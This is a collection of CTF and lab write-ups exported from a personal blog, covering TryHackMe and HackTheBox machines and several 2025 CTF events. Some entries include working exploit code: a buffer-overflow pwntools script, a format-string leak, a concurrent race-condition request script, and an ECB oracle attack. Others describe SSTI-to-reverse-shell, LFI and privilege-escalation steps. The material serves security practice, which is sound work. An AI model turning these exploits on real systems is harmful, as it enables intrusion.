[{"content":" Enumeration # For port enumeration, I started with rustscan and then did a detailed scan with nmap.\nRustscan result:\nnmap result for the ports:\nFor directory enumeration, I mainly use gobuster.\nGobuster directory enumeration:\nThere wasn’t anything useful i could get from here so I went back to main site.\nThen, I tried signing up but it was for subscribed users only. Then after some messing around I found we can add another parameter in burp request. also we have to change our email and password while sending the request. These will be our creds to login as subscribed user.\nGetting shell # This is what we see when login. There is a file upload but it strips the extension and uploads it. while going to the file path it is downloaded to the system.\nNow let’s try getting it local host files.\nIt works!! BUT idk if it will give me anything outside /var\nSINCE, this is rabbit mq, maybe there is an admin port in the localhost of the machine?? Let’s try.\nLooks like it works.\nLooking at this result, I didn’t find anything interesting so, I fuzzed /api endpoint.\nAfter fuzzing for /api endpoints i found a /api/docs endpoint which then uploaded gave a interesting endpoint of an chatbot\nAfter catching the request for chatbot, i messed around a bit but could not find anything. After I received a hint that there was either XSS or SSTI, I realized there was no XSS so I then searched for SSTI exploit payloads. A simple payload, if I were to put some values between two curly brackets like so {{7*3}} it’s result would be printed in the response. This worked, which meant I could insert a payload to gain a reverse shell. As I had no experience in exploiting SSTI, I asked the almighty ChatGPT for help. It generated me a payload which I inserted in the username parameter.\nPrivilege Escalation # With a linpeas scan I found a directory called rabbitmq. When I listed all files I found a cookie file. This could mean we have a exploit using this cookie??\nSearching for erlang in metasploit we do get a cookie reverse shell exploit. BUT this wasn’t working on my machine because my metasploit was recently updated, so I had to use TryHackMe attackbox. After gaining a shell of rabbitmq from metasploit, I ran a python3 reverse shell and got the shell in my machine.\nRemember how we got index.html of the admin port through localhost? We are going to forward that port to our localhost so that we can access the admin page. For this i used chisel and forwarded the port.\nThe default credentials were not working, digging around in official documentation of rabbitmq, we need to make the user with admin permission ourselves then we can access the page. So, I again closed the chisel server-client i was running and created the user called admin in the rabbitmq’s shell and again ran chisel.\nIT WORKED!!\nLooking around, I find a interesting file and downloaded it.\nTurns out this contains hashes, what a luck right? NOOOO\nI spent more than 5 hours trying to crack it but no use. THIS WAS A RABBIT HOLE.\nAfter many trials and errors we found the password for root, the password seems to be the hash it self.\n","date":"14 December 2025","externalUrl":null,"permalink":"/writeups/tryhackme/rabbitstr/","section":"Writeups","summary":"","title":"Rabbit Store","type":"writeups"},{"content":"","date":"14 December 2025","externalUrl":null,"permalink":"/","section":"Subeg Suwal","summary":"","title":"Subeg Suwal","type":"page"},{"content":"","date":"14 December 2025","externalUrl":null,"permalink":"/tags/","section":"Tags","summary":"","title":"Tags","type":"tags"},{"content":"","date":"14 December 2025","externalUrl":null,"permalink":"/tags/tryhackme/","section":"Tags","summary":"","title":"TryHackMe","type":"tags"},{"content":" glutto.n\nView Profile → ","date":"14 December 2025","externalUrl":null,"permalink":"/writeups/tryhackme/","section":"Writeups","summary":"","title":"TryHackMe","type":"list"},{"content":"A stash of write-ups dissecting challenges, exploits, and machines—sorted by the platforms they were dropped on.\n","date":"14 December 2025","externalUrl":null,"permalink":"/writeups/","section":"Writeups","summary":"","title":"Writeups","type":"list"},{"content":"","date":"20 June 2025","externalUrl":null,"permalink":"/tags/2025/","section":"Tags","summary":"","title":"2025","type":"tags"},{"content":"","date":"20 June 2025","externalUrl":null,"permalink":"/tags/ctf/","section":"Tags","summary":"","title":"CTF","type":"tags"},{"content":" SOFTWARICA HACKFEST 2.0 # WEB # Read between the lines # The Hidden Entity # The Forgotten Key # org request\nlogged in and got this\nchecking system controls\nNinja Notes # Everything is yours # can also be done like this\nRead between the lines-2 # Solution:\nLFI with php filter\nCrypto # Happy Holi # Flag: softwarica{DEC0L0R}\nsubstitution cipher # decode me # Misc # ? Not Really. # Time Machine # Copy_Paste # The provided Page had a function running which on copy event changed every copied text will be this string: DDKVPefm\nChecking this string in dcode.fr\nGot the Flag.\nGitar updated # crack me if you can # converting zip to hash\nWasn’t working on unzip so used 7z.\nWe have data from /etc/passwd and /etc/shadow . unshadowing it and prepared to crack using --format=crypt .\nFlag: softwarica{ _defensive4}\nvirus # Flag: softwarica{ILuVYOU}\nOSINT # Follow the feed # There was a ROT 47 Ciphertext here which gave the flag.\n","date":"20 June 2025","externalUrl":null,"permalink":"/writeups/ctfs/softwarica-hackfest-2.0/","section":"Writeups","summary":"","title":"SOFTWARICA HACKFEST 2.0 2025","type":"writeups"},{"content":"","date":"14 March 2025","externalUrl":null,"permalink":"/tags/hackthebox/","section":"Tags","summary":"","title":"HackTheBox","type":"tags"},{"content":" Instant-htb # First of all add the machine IP to your /etc/hosts file.\nThe nmap scan for the machine IP showed:\nI didn’t use any options as it gives quick results but also provides less details.\nThere is http and ssh in default ports. The HTTP server seems to be a wallet webapp. Only interaction i could get was download and contact us. I downloaded the apk and used apktools.\napktool d instant.apk\nThis revealed the application’s code and assets, including Smali files that contain the app’s logic.\nI checked “/smali/com/instantlabs/instant/adminactivities.smali” and found a JWT token and used it in burp suite. Also, I found another sub domain there “mywalletv1.instant.htb”. Using this as host and adding the JWT token as authorization I ran burpsuite.\nThen I looked in xml directory inside res directory. I concated the “network_security_config.xml” file and found another subdomain, “swagger-ui.instant.htb”. Then i used this in burp requesto to views logs.\nThen I used LFI exploit\nI used LFI to get ssh key\nPrivilege Escalation # After gaining the ssh shell, I used linpeas.sh to scan the machine and found an db(instant.db).\nThere were some hashed passwords and usernames but i was unable to crack the hash. So, I checked another file i found using linpeash, “sessions-backup.dat” present in /opt/backups folder.\nIt normally contains passwords for root. It had encrypted password.\nI used this github repo to crack it: “https://github.com/ItsWatchMakerr/SolarPuttyCracker”.\nThen I switched to root and got the root flag.\n","date":"14 March 2025","externalUrl":null,"permalink":"/writeups/hackthebox/instant-htb/","section":"Writeups","summary":"","title":"Instant","type":"writeups"},{"content":"","date":"14 March 2025","externalUrl":null,"permalink":"/tags/medium/","section":"Tags","summary":"","title":"Medium","type":"tags"},{"content":"","date":"11 March 2025","externalUrl":null,"permalink":"/tags/vishwactf/","section":"Tags","summary":"","title":"VishwaCTF","type":"tags"},{"content":" Due to some teams being disqualified, we were later ranked 11th.\nWeb Exploitation # Challenge: Flames # Flag: VishwaCTF{SQL_1nj3ct10n_C4n_Qu3ry_Your_He4rt} # This challenge must be done by spawning the instance.\nWe got stuck in a rabbit hole, it gave us results of XSS so we tried fetching it through our webhook with no avail.\nThen we stumbled across a new endpoint. /db.php\nThis error made us think there is sqli again, as our previous attempts failed. Then we tried union sqli with syntax 'UNION SELECT 1,2,3;-- -.\nThen we saw some outputs we didn’t saw before. AND the link we get gives us access to famous love stories and our flag.\nChallenge: scan-it-to-stay-safe # Flag: VishwaCTF{Y0u_7R4c30lI7_3000_4rK} # After starting the instance we get to see a url scanner.\nSo, why not try http://localhost/flag, right? It didn’t work and also said max tries reached for it.\nBut this challenge was also very guessy. We tried web hook. IT WORKED. When we check the url of the Web hook, and checked the web hook site we got our flag in one of the headers called flag.\nChallenge: Are We Up? # Flag: VishwaCTF{Y0r4_lo7al_b4bby_A4k18aw2} # This was quite a hard challenge though it was rated as medium.\nAfter gaining the domain for this challenge we also found the availability checker of uptimer so we tried to bypass localhost:8080 while submitting the url using ngrok server.\nThen when we tried redirecting 127.0.0.1:8080/flag instead of using localhost:8008 we succeed in retriving the flag.\nChallenge: Forgot-h1-login # Flag: VishwaCTF{y0u_4r3_7h3_h4ck3r_numb3r_0n3_2688658} # First we try to send the reset request and redirect it to our email hook site using burpsuite.\nIn response we get otp and also the flag in x-ctf-secrets header\nCryptography # Challenge: Rythmic Cipher # Flag: VishwaCTF{CIPHERED_DANCE} # This challenge provided us with 2 gifs.\nThese gifs had dancing men so we thought of dancing man cipher. So we used a gif decompiler to split our gif into frames.\nThen we went to dcode.fr to decode this using dancing man cipher\nThis is the contents of the flag, the flag format was VishwaCTF{word1_word2}\nChallenge: Aira of the Lost Code # Flag: VishwaCTF{H4v3_y0u_7ri3d_Ar_70n3l1c0} # This challenged provided us with one .png file which contained different symbols.\nComparing these symbols in dcode.fr symbol cipher list we saw a cipher called hymnos cipher.\nAnd decoding this gave us the contents of the flag.\nFun Fact: Ar Tonelico is a game that uses this cipher.\nChallenge: Chaos # Flag: VishwaCTF{CrYpt0_cRyPT0_1g_It_1s_sOm3_7hiNg_t0_D0} # Challenge.py:\noutput.txt\nsolve.py:\nOutput:\nChallenge: Forgotten Cipher # Flag: VishwaCTF{VIC_Decoded_113510} # Along with these we were given 1 file called info.txt which contained the following:\nEncrypted Message :- 0d4ac648a2f0bee7bccf0231c35e13ba7bc93a2d8f7d9498885e3f4998 Key Evolution Formula :- K(n) = [ K(n−1) × 3 + index ] mod 25 After the hint was given we gave the description, hint and contents of the info.txt file to chat gpt which then provided us with a script which actually worked.\nSolution:\ndef rotate_right(val, r_bits, max_bits=8): \u0026#34;\u0026#34;\u0026#34;Performs a right rotation on an integer value.\u0026#34;\u0026#34;\u0026#34; return ((val \u0026gt;\u0026gt; r_bits) | (val \u0026lt;\u0026lt; (max_bits - r_bits))) \u0026amp; ((1 \u0026lt;\u0026lt; max_bits) - 1) def rotate_left(val, r_bits, max_bits=8): \u0026#34;\u0026#34;\u0026#34;Performs a left rotation on an integer value.\u0026#34;\u0026#34;\u0026#34; return ((val \u0026lt;\u0026lt; r_bits) | (val \u0026gt;\u0026gt; (max_bits - r_bits))) \u0026amp; ((1 \u0026lt;\u0026lt; max_bits) - 1) def decrypt_vic_cipher(ciphertext_hex, initial_key): \u0026#34;\u0026#34;\u0026#34; Decrypts a given ciphertext using the VIC cipher. ciphertext_hex: The hexadecimal string representing the ciphertext. initial_key: The starting key for the cipher decryption. \u0026#34;\u0026#34;\u0026#34; # Convert the hexadecimal string to bytes ciphertext = bytes.fromhex(ciphertext_hex) plaintext = bytearray(len(ciphertext)) key = initial_key for i, c in enumerate(ciphertext): # Update the key based on the current index key = (key * 3 + i) % 256 # Reverse the rotation based on the index if i % 2 == 0: # If index is even, reverse a left rotation with a right rotation temp = rotate_right(c, 2) else: # If index is odd, reverse a right rotation with a left rotation temp = rotate_left(c, 2) # Reverse XOR with the key to get the original plaintext byte plaintext[i] = temp ^ key # Decode the plaintext to a UTF-8 string return plaintext.decode(\u0026#39;utf-8\u0026#39;, errors=\u0026#39;replace\u0026#39;) # Example usage ciphertext_hex = \u0026#34;0d4ac648a2f0bee7bccf0231c35e13ba7bc93a2d8f7d9498885e3f4998\u0026#34; initial_key = 7 result = decrypt_vic_cipher(ciphertext_hex, initial_key) print(\u0026#34;Decrypted Flag:\u0026#34;, result) Reverse Engineering # Challenge: Safe Box # Flag: VishwaCTF{h3r3_y0u_@r3} # This challenge gave us a .zip file which contained\nContents of the zip file:\nThen, the files were transferred to our windows vm.\nWe need melon loader, unity explorer for this challenge.\nAfter it is fully loaded we get this UI:\nWe were stuck here for while trying to reverse the executable. After messing around we got the flag by opening the object explorer extending the container in the list and unchecking game object which removed the front layer, revealing the flag.\nChallenge: Hungry Friend # Flag: VishwaCTF{th3r3_4r3_5n4k35_all_4r0und} # This challenge gave us a .exe file.\nI used a vm for this. Initially it wasn’t running due to missing libraries of GCC. So I installed MinGW.\nAs for patching the binary, we used ghidra. Only patching it needed was change the comparing number.\nIt checked the score of the user, if it was 9999 which then called the function called SHOW_FLAG.\nSo, to patch this we change the comparing value to one.\nNow, when we run it, it should gove us the flag when our score is 1.\nChallenge: Phantom Rollcall # Flag:VishwaCTF{ReV_EngIn33ring_Is_Crezy} # First intercepted the network traffic saw a firebase api calls, we checked if it was open then began searching.\nThen, tried if we can run other queries in the firebase. Then we guessed so hard asf that we stumbled upon this glorious yet unknown secret.\nAfter that we used that key in this dumb enter attendance code once that’s done.\nHere you go the flag:\nSteganography # Challenge: Quadrant # Flag: VishwaCTF{aG9lMTIzNDU2c3Bhc3NhZ2U=} # This challenge provided us with a zip file containing 4 pictures named flag1,2,3,4.\nThese images contained some pieces of qr code.\nNow we have to combine this so we can get a valid output, so we used Gimp to restore the broken qr.\nThough this was still not complete we gave it to google lens without expecting anything but we got the flag.\nChallenge: Spilled Paint Water # Flag: VishwaCTF{STROKE__N_FILL} # This Challenge gave us a file called canvas.svg which on opening was just blank.\nThen we opened it in a text editor and changed width and height to 300 but no result was seen.\nThis also didn’t give any result so, as last effort we asked chatgpt to fix this and it gave us the fixed version.\nChallenge: Let’s Race # Flag: VishwaCTF {1_l0v3_ C0r5} # This challenge provided us with a zip file and had a note use winrar .\nWe have a avif file and a doc.txt which had a hint.\nWe tried many things but no avail. then we changed it to .png and went to extract the data using stegonline. AND while keeping the value of R=1, G=2, B=3 we got the flag.\nChallenge: Echoes of Unknown # Flag: VishwaCTF{CR4CK3D_7H3_C0D3} # Uploading the file directly didn’t give anything useful. So we used audacity and we could see the morse code.\nWhen we crack the morse code we get our flag contents.\nDIFR # Challenge: Leaky Stream # Flag: VishwaCTF{this_is_first_part_this_second_part} # This challenge gave us a pcap file, so just to ttry our luck we simply did strings and grep “VishwaCTF” and guess what?, we got first part of the flag.\nAs this gave us the first part of flag, we tried grepping “}” and scan through the output to get the other half of the flag. AND we got another part of the flag.\nChallenge: Persist # Flag: VishwaCTF{b3l1ef_in_r3g_p0wer} # We used the RegRipper Tool for the HKCU file. https://github.com/keydet89/RegRipper3.0\nCloser inspection of report.txt :\nWe got the flag.\nOSINT # Challenge: The lecture code # Flag: VishwaCTF{cs5o_qu4ck!} # Linked in enumeration:\nThen checking vishwactf.com/heroes\nIn github:\nmodified crack2.py:\ndef custom_decrypt(encrypted_text): shift = 3 # Same shift used for encryption reversed_text = \u0026#34;\u0026#34;.join(chr(ord(c) - shift) for c in encrypted_text) # Reverse shift original_text = reversed_text[::-1] # Reverse back to original print(original_text) hidden_encrypted_pass = \u0026#34;$nf7xtbr8vf\u0026#34; custom_decrypt(hidden_encrypted_pass) Challenge: Stadium!! # Flag: VishwaCTF{Saling_Cricket_Stadium_Ghanche} # Checking given image in google lens:\nChecking the X account we know the name.\nChallenge: Follow For Clues # Flag:VishwaCTF{L3t_Th3_hUn7_8Eg1n} # There was nothing in linked in and twitter so we looked up in instagram. Checking about 10 posts, we got the flag.\nChallenge : The Summit # Flag: VishwaCTF{18.51,73.89_Devendra Fadnavis} # The THeMIS in tank suggest it was event related to military power showcase and the peoples seems to be from India ,and there was date in the watermark of image. so i googled for the military event organized in Jan 5 , 2025 in India and there was event named , “Know your Army”. and it was organized by southern command and also got another article : https://www.punekarnews.in/pune-know-your-army-mela-2025-set-to-showcase-indian-armys-strength-and-innovation-from-january-3-5/\nThe event was organized in race course of RWITC whose coordinates was , 18.51, 73.89 and after using Chatgpt for adjusting the coordinates we got the flag: VishwaCTF{18.51,73.89_Devendra Fadnavis}\n","date":"11 March 2025","externalUrl":null,"permalink":"/writeups/ctfs/vishwactf/","section":"Writeups","summary":"","title":"VishwaCTF 2025","type":"writeups"},{"content":"","date":"3 March 2025","externalUrl":null,"permalink":"/tags/apoorvctf/","section":"Tags","summary":"","title":"ApoorvCTF","type":"tags"},{"content":" Binary Exploitation # Challenge: Kogarashi Café - The First Visit # Flag: apoorvctf{c0ffee_buff3r_sp1ll} # Solution:\nfrom pwn import * p = remote(\u0026#34;chals1.apoorvctf.xyz\u0026#34;, 3001) # Connect to challenge server brew_coffee_addr = 0x0804856b # Address of brew_coffee() ret_gadget = 0x080483d0 # Optional \u0026#34;ret\u0026#34; instruction (stack alignment) payload = b\u0026#34;A\u0026#34; * 40 # Fill buffer payload += p32(ret_gadget) # Optional ret gadget (for alignment) payload += p32(brew_coffee_addr) # Overwrite return address p.sendline(payload) # Send exploit payload print(p.recvall().decode(errors=\u0026#34;ignore\u0026#34;)) # Receive flag output p.close() Challenge: Kogarashi Café - The Secret Blend # Flag: apoorvctf{Th3_M3nu_L34ks_M0re_Than_It_Sh0uld} # Solution:\n┌──(myenv)─(glutton㉿glutton)-[~/CTF/apoorvCTF/files] └─$ nc chals1.apoorvctf.xyz 3003 Welcome to Kogarashi Café. Barista: \u0026#39;What will you have?\u0026#39; %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p 0x5b8481 0xfbad2288 0xffa47b7f 0x5b84b0 (nil) 0x746376726f6f7061 0x334d5f3368547b66 0x736b34334c5f756e 0x68545f6572304d5f 0x68535f74495f6e61 0x7d646c7530 0x404050 0x7f29c379f5e0 0x7025207025207025 0x2520702520702520 0x2070252070252070 now 0x746376726f6f7061 0x334d5f3368547b66 0x736b34334c5f756e 0x68545f6572304d5f 0x68535f74495f6e61 0x7d646c7530 reversing these and unhexing in cyberchef we get flag\nChallenge: Kogarashi Café - The Forbidden Recipe # Flag: apoorvctf{d3caf_is_bad_f0r_0verfl0ws} # Solution:\nfrom pwn import * # Remote connection to CTF challenge p = remote(\u0026#34;chals1.apoorvctf.xyz\u0026#34;, 3002) # Construct payload payload = b\u0026#34;A\u0026#34; * 32 # Fill buffer payload += p32(0xdecafbad) # Overwrite local_14 payload += p32(0x00c0ff33) # Overwrite local_10 # Send payload p.sendline(payload) # Interact with the shell/flag output p.interactive() Web Exploitation # Challenge: Blog-1 # Flag: apoorvctf{s1gm@_s1gm@_b0y} # This challenge only allows users to create one blog at a time so we have to make a race condition to let the server approve the request we send. For this challenge, we had to create 5 blogs after which gives us a reward.\nimport asyncio import aiohttp URL = \u0026#34;http://chals1.apoorvctf.xyz:5001/api/v1/blog/addBlog\u0026#34; HEADERS = { \u0026#34;Host\u0026#34;: \u0026#34;chals1.apoorvctf.xyz:5001\u0026#34;, \u0026#34;User-Agent\u0026#34;: \u0026#34;Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\u0026#34;, \u0026#34;Accept\u0026#34;: \u0026#34;application/json, text/plain, */*\u0026#34;, \u0026#34;Accept-Language\u0026#34;: \u0026#34;en-US,en;q=0.5\u0026#34;, \u0026#34;Accept-Encoding\u0026#34;: \u0026#34;gzip, deflate, br\u0026#34;, \u0026#34;Content-Type\u0026#34;: \u0026#34;application/json\u0026#34;, \u0026#34;Authorization\u0026#34;: \u0026#34;Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI2N2MzZGQwMDZlNzk5OWVlMDJjM2NhYjciLCJ1c2VybmFtZSI6InNleHkiLCJpYXQiOjE3NDA4ODkzNDksImV4cCI6MTc0MDg5Mjk0OX0.gJ9PwASH5SmXIa1rYrdQCxtYqGxyZikQcFS95YsCAEY\u0026#34;, \u0026#34;Origin\u0026#34;: \u0026#34;http://chals1.apoorvctf.xyz:5001\u0026#34;, \u0026#34;Connection\u0026#34;: \u0026#34;keep-alive\u0026#34;, \u0026#34;Referer\u0026#34;: \u0026#34;http://chals1.apoorvctf.xyz:5001/\u0026#34;, \u0026#34;Priority\u0026#34;: \u0026#34;u=0\u0026#34; } PAYLOAD = { \u0026#34;title\u0026#34;: \u0026#34;Race condition\u0026#34;, \u0026#34;description\u0026#34;: \u0026#34;success\u0026#34;, \u0026#34;visible\u0026#34;: True, \u0026#34;date\u0026#34;: \u0026#34;2025-03-01T09:47:38.723Z\u0026#34; } # Set the number of concurrent requests per wave. NUM_REQUESTS_PER_WAVE = 500 async def send_request(session, i, start_event): # Wait until all tasks are ready to send their request await start_event.wait() try: async with session.post(URL, json=PAYLOAD, headers=HEADERS) as response: text = await response.text() return i, response.status, text except Exception as e: return i, None, f\u0026#34;Exception: {str(e)}\u0026#34; async def run_wave(session, wave_number): # Create an event to synchronize the start of all requests in the wave. start_event = asyncio.Event() tasks = [asyncio.create_task(send_request(session, i, start_event)) for i in range(NUM_REQUESTS_PER_WAVE)] # Small delay to ensure all tasks are waiting on the event. await asyncio.sleep(0.1) # Release all tasks to send their request concurrently. start_event.set() results = await asyncio.gather(*tasks) successes = [] for i, status, text in results: # If the response text does not include the rejection message, consider it a success. if \u0026#34;Only one blog per day\u0026#34; not in text: successes.append((i, status, text)) print(f\u0026#34;Wave {wave_number}: {len(successes)} successes out of {NUM_REQUESTS_PER_WAVE} requests\u0026#34;) return successes async def main(): success_entries = [] wave = 1 async with aiohttp.ClientSession() as session: while len(success_entries) \u0026lt; 5: successes = await run_wave(session, wave) success_entries.extend(successes) print(f\u0026#34;Total successes so far: {len(success_entries)}\u0026#34;) wave += 1 # Optional delay between waves to avoid flooding the server await asyncio.sleep(0.5) print(f\u0026#34;\\n--- Achieved {len(success_entries)} successful blog posts ---\u0026#34;) for entry in success_entries: print(f\u0026#34;Request {entry[0]}: Status {entry[1]} - {entry[2]}\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: asyncio.run(main()) The reward provided a YouTube link: https://youtu.be/WePNs-G7puA?si=DOUFW9vAgUKdClxX\nWhen looking at burp request we had endpoint /api/v1/addBlog initially, after creating 5 blogs, we got another another endpoint, /api/v2/gift . This was vague but hard to notice so we were stuck for a while. Then we got the flag after making the endpoint /api/v1/gift and sent the request through burp-suite.\nChallenge: Seo Ceo # Flag: apoorvctf{s30_1snT_0pt1onaL} # In this challenge, we found 2 files robots.txt and sitemap.xml. we had a fake flag in robots.txt.\nIn sitemap.xml, we found a mysterious endpoint\nVisisting it we were asked a question,”Do you want the “flag” yes/no?”.\nWe were stuck on how to answer this question, until we thought of it as a parameter in url, flag=yes.\nand it worked.\nMiscellaneous # Challenge: Ghosted on the 14th # Flag: apoorctf{1m_g01ng_1n5an3} # This challenge had a pcap file which contained single http traffic.\nThis had a destination in ip 172.200.32.81:8080 normally we can’t access it, but with waybackmachine we could. There was some base64 string in source.\nCryptography # Challenge: Kowareta Cipher # Flag: apoorvctf{3cb_345y_crypt0_br34k} # Solution:\nfrom pwn import remote def get_ciphertext(io, hex_input): io.sendlineafter(\u0026#34;Enter your input:\u0026#34;, hex_input) response = io.recvline().decode(errors=\u0026#39;ignore\u0026#39;).strip() if \u0026#34;Ciphertext:\u0026#34; in response: return response.split(\u0026#34;Ciphertext: \u0026#34;)[1] else: print(\u0026#34;[-] No ciphertext received. Possible connection issue.\u0026#34;) return \u0026#34;\u0026#34; def detect_block_size(io): base_input = \u0026#34;41\u0026#34; # Minimal valid input (\u0026#34;A\u0026#34; in hex) base_len = len(get_ciphertext(io, base_input)) for i in range(2, 33): new_len = len(get_ciphertext(io, \u0026#34;41\u0026#34; * i)) if new_len \u0026gt; base_len: return new_len - base_len return None def confirm_ecb(io, block_size): test_input = \u0026#34;41\u0026#34; * block_size * 2 # Two identical blocks ciphertext = get_ciphertext(io, test_input) if len(ciphertext) \u0026gt;= block_size * 4: return ciphertext[:block_size * 2] == ciphertext[block_size * 2:block_size * 4] return False def recover_flag(io, block_size): flag = b\u0026#34;\u0026#34; for i in range(block_size * 2): padding = \u0026#34;41\u0026#34; * (block_size - 1 - (i % block_size)) known_block = get_ciphertext(io, padding)[:block_size * 2] found = False for b in range(256): guess = padding + flag.hex() + format(b, \u0026#39;02x\u0026#39;) attempt_cipher = get_ciphertext(io, guess) if len(attempt_cipher) \u0026gt;= block_size * 2 and attempt_cipher[:block_size * 2] == known_block: flag += bytes([b]) print(f\u0026#34;[+] Found: {flag.decode(errors=\u0026#39;ignore\u0026#39;)}\u0026#34;) found = True break if not found: print(\u0026#34;[-] Failed to match a byte. Exiting.\u0026#34;) break return flag.decode(errors=\u0026#39;ignore\u0026#39;) def main(): try: io = remote(\u0026#34;chals1.apoorvctf.xyz\u0026#34;, 4001) print(\u0026#34;[+] Connected to challenge server\u0026#34;) block_size = detect_block_size(io) if block_size: print(f\u0026#34;[+] Block size detected: {block_size}\u0026#34;) else: print(\u0026#34;[-] Failed to detect block size\u0026#34;) return if confirm_ecb(io, block_size): print(\u0026#34;[+] ECB mode confirmed!\u0026#34;) else: print(\u0026#34;[-] ECB mode NOT detected. Exiting.\u0026#34;) return flag = recover_flag(io, block_size) print(f\u0026#34;[+] Recovered Flag: {flag}\u0026#34;) except Exception as e: print(f\u0026#34;[!] Error: {str(e)}\u0026#34;) finally: io.close() print(\u0026#34;[*] Connection closed.\u0026#34;) if name == \u0026#34;main\u0026#34;: main() Challenge: Split Lies # Flag: apoorvctf{L4y3R3d_T2u7H} # For this challenge, we were given 2 images which we had to join with pixels.\nAfter adding we had a flag which could not be read. So we asked deepseek to make a script for this.\nSolution:\nfrom PIL import Image import numpy as np def load_image(image_path): \u0026#34;\u0026#34;\u0026#34;Load an image from the given path and convert it to a numpy array.\u0026#34;\u0026#34;\u0026#34; with Image.open(image_path) as img: return np.array(img) def add_pixel_values(img1, img2): \u0026#34;\u0026#34;\u0026#34;Add pixel values of two images.\u0026#34;\u0026#34;\u0026#34; # Clip the values to ensure they stay within the valid range (0-255) return np.clip(img1 + img2, 0, 255) def save_image(pixel_array, output_path): \u0026#34;\u0026#34;\u0026#34;Save a numpy array as an image.\u0026#34;\u0026#34;\u0026#34; img = Image.fromarray(pixel_array.astype(\u0026#39;uint8\u0026#39;)) img.save(output_path) def main(image1_path, image2_path, output_path): # Load the images img1 = load_image(image1_path) img2 = load_image(image2_path) # Ensure both images have the same dimensions if img1.shape != img2.shape: raise ValueError(\u0026#34;Both images must have the same dimensions.\u0026#34;) # Add pixel values combined_pixels = add_pixel_values(img1, img2) # Save the resulting image save_image(combined_pixels, output_path) print(f\u0026#34;Resulting image saved to {output_path}\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: # Replace with the paths to your images image1_path = \u0026#34;part1.png\u0026#34; image2_path = \u0026#34;part2.png\u0026#34; output_path = \u0026#34;output_image.png\u0026#34; main(image1_path, image2_path, output_path) Reverse Engineering # Challenge: Holy Rice # Flag: apoorvctf{w41t#_th15_1s_1ll3g4l!} # Solution:\nimport string # Given transformed string s2 = \u0026#34;6!!sbn*ass%84z@84c(8o_^4#_#8b0)5m_\u0026amp;j}y$vvw!h\u0026#34; # Step 1: Reverse the string (undo sub_1418) reversed_s = s2[::-1] # Step 2: Remove every extra inserted character from \u0026#34;!@#$%^\u0026amp;*()\u0026#34; (undo sub_12CB) extra_chars = \u0026#34;!@#$%^\u0026amp;*()\u0026#34; filtered_s = \u0026#34;\u0026#34;.join(c for i, c in enumerate(reversed_s) if (i % 4) != 1) # They were inserted every 3rd original char # Step 3: Reverse the character shift (undo sub_1199) charset = \u0026#34;0123456789abcdefghijklmnopqrstuvwxyz_{}\u0026#34; shifted_charset = charset[7:] + charset[:7] # Create the shifted mapping reverse_map = {shifted_charset[i]: charset[i] for i in range(len(charset))} # Reverse mapping original_s = \u0026#34;\u0026#34;.join(reverse_map[c] if c in reverse_map else c for c in filtered_s) print(\u0026#34;Recovered password:\u0026#34;, original_s) OSINT # Challenge: I Love Japan: Flag Hunt # Flag: apoorvctf{Fr13ndsh1p_G04ls} # From previous challenge’s image we get to know the user name of github. Here we see a esolang written in Japanese. This code gave fake flag is user answered yes. But the commit description said printed flag helps nad gave us what seems like base64.\nAfter fiddling around for a long time, I opened a ticket and got to know that the whole fake flag was a key. so we tried various cipher with no avail. Then we asked chat gpt which replied it might be AES, DES and more so we tired AES after converting the base64 string and the key to hex. Using KEY and IV as same in AES we got the flag while jumping around the modes in cyberchef.\n","date":"3 March 2025","externalUrl":null,"permalink":"/writeups/ctfs/apoorvctf/","section":"Writeups","summary":"","title":"ApoorvCTF 2025","type":"writeups"},{"content":"","date":"28 January 2025","externalUrl":null,"permalink":"/writeups/ctfs/","section":"Writeups","summary":"","title":"CTFs","type":"list"},{"content":" glutton2\nView Profile → ","date":"28 January 2025","externalUrl":null,"permalink":"/writeups/hackthebox/","section":"Writeups","summary":"","title":"HackTheBox","type":"list"},{"content":" SOFTWARICA HACKFEST 2025 Jan 03 Writeup by Team TkNB@Nepal # Challenge name: Happy Holi! # Category: Misc # This challenge provided an image file which had various color combination.\nIn dcode.fr we have a tool called cipher identifier. There is a graphical section which contains gravity falls color code . The colors on top left represented it. So, I matched the colors and got a text when decoded.\nThis gave me the contents of the flag. But, I had to modify this a bit and submitted the flag.\nFinal flag: softwarica{hacker_love_black_color}\nChallenge name: Math genius! # Category: Misc # This challenge was provided through a docker container which could be accessed using nc command. This challenge was based on math problems. So, we wrote a script which extracts the math expression, evaluates it and returns the answer and automatically inputs it to the challenge. Running this script ran the program for sometime and gave us a flag.\nPython script used:\nimport socket import re def solve_question(question): # Extract the math expression using regex match = re.search(r\u0026#34;Solve\\s+(.*)\\s+:\u0026#34;, question) if match: expression = match.group(1) try: # Evaluate the math expression return str(eval(expression)) except Exception as e: print(f\u0026#34;Error evaluating expression: {expression}\u0026#34;) return None return None def main(): host = \u0026#34;172.100.100.23\u0026#34; port = 1603 # Connect to the server with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.connect((host, port)) print(\u0026#34;Connected to the server...\u0026#34;) while True: # Receive data from the server data = s.recv(1024).decode() if not data: print(\u0026#34;Disconnected from the server.\u0026#34;) break print(f\u0026#34;Server: {data}\u0026#34;) # Check if the data contains a question if \u0026#34;Solve\u0026#34; in data: answer = solve_question(data) if answer: print(f\u0026#34;Answer: {answer}\u0026#34;) s.sendall(answer.encode() + b\u0026#39;\\n\u0026#39;) else: print(\u0026#34;Failed to solve the question.\u0026#34;) break elif \u0026#34;Free Flag\u0026#34; in data or \u0026#34;Good luck\u0026#34; in data: continue else: print(\u0026#34;Unexpected server response. Exiting.\u0026#34;) break if __name__ == \u0026#34;__main__\u0026#34;: main() Challenge name: E*VAL services # Category: Misc # This challenge also provided a nc command connecting to a docker. It was a pyjail challenge.\nThis was quite an easy challenge. Looking through its source we found that providing a character we could get the flag. But, when entered correct character it just returned correct but no flag. So, we printed the character ( print(x) ). Though it said wrong, we got a flag.\n","date":"28 January 2025","externalUrl":null,"permalink":"/writeups/ctfs/softwarica-hackfest/","section":"Writeups","summary":"","title":"SOFTWARICA HACKFEST 2025","type":"writeups"},{"content":" after gaining the ip of machine i quickly started nmap scan\nnmap 